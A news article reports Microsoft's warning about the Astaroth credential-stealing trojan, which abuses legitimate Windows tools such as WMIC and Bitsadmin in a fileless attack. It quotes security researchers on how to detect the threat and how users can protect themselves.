Microsoft Confirms Windows 'Great Duke Of Hell' Malware Attack

Researchers from the Microsoft Defender Advanced Threat Protection Research Team have issued a warning to confirm that a notorious credential-stealing malware threat is targeting Windows users. What makes this one so dangerous is that it uses an "invisible man" methodology by only running files within the attack chain that are legitimate system tools and so hides in plain sight.

The Astaroth Trojan can employ many techniques, including keylogging and clipboard monitoring, to steal login credentials. However, it is the way that it exploits living off the land binaries (LOLbins) that has created a certain level of infamy for the malware. In the case of the threat campaign that the newly published Microsoft report confirms, it was the Windows Management Instrumentation Command-line (WMIC) that was the LOLbin in question. Andrea Lelli, part of the Microsoft Defender ATP Research Team and author of the report, notes that the victim still has to click on a malicious link in an email to initiate the attack chain via a file that runs an obfuscated batch file. This batch file, in turn, runs the legitimate WMIC system tool in such a way that an obfuscated JavaScript file runs automatically.

Now, this is where things get necessarily complicated, involving more obfuscated JavaScript code and more legitimate system tools running. The most important in the attack-chain being the Background Intelligent Transfer Service (Bits) admin tool that is used (actually, multiple instances of Bitsadmin are used) to download additional payloads. These kinds of fileless attacks, as they are known, run the malicious payloads "directly in memory or leverage legitimate system tools to run malicious code without having to drop executable files on the disk," Lelli explained.

Eli Salem, a security researcher at Cybereason who uncovered another Astaroth attack earlier in the year, told me that these attacks are considered challenging to detect as "the full process of the deployment and execution of the malware" is by way of those Windows LOLBins. "To an average person, this activity can seem like a legitimate Windows activity," Salem says "because it's being executed by Windows processes."

However, "using invisible techniques and being actually invisible are two different things," Lelli explained. Because some of the techniques used were so "unusual and anomalous," Microsoft Defender ATP, the commercial version of the Windows Defender Antivirus component that is included free of charge with Windows 10, was able to spot the Astaroth attack.

If you are not using Defender ATP, however, then Salem advises Windows users to be extra careful "when opening anonymous or new .lnk and .zip files that came from suspicious mail attachments." I also spoke to Kevin Reed, the CISO of Acronis, this afternoon who says that as fileless malware is a very efficient technique, avoiding detection by many existing anti-malware products, users should choose a solution "that employs advanced malware detection techniques such as memory scanning, stack trace analysis, and system call-based detection as these will expose malware residing in PC memory only."

One thing is for sure, and that is I doubt it is the last we will hear of Astaroth and fileless malware. According to a recent WatchGuard threat intelligence report, "fileless threats appeared in both WatchGuard's top 10 malware and top 10 network attack lists. On the malware side, a PowerShell-based code injection attack showed up in the top 10 list for the first time, while the popular fileless backdoor tool, Meterpreter, made its first appearance in the top 10 list of network attacks too."

Corey Nachreiner, CTO of WatchGuard Technologies, said at the time that "it's clear that modern cybercriminals are leveraging a bevy of diverse attack methods," and I have yet to see anything to think he's wrong. As Sergeant Phil Esterhaus used to say in every episode of cop drama Hill Street Blues back in the 1980s: "Hey, let's be careful out there."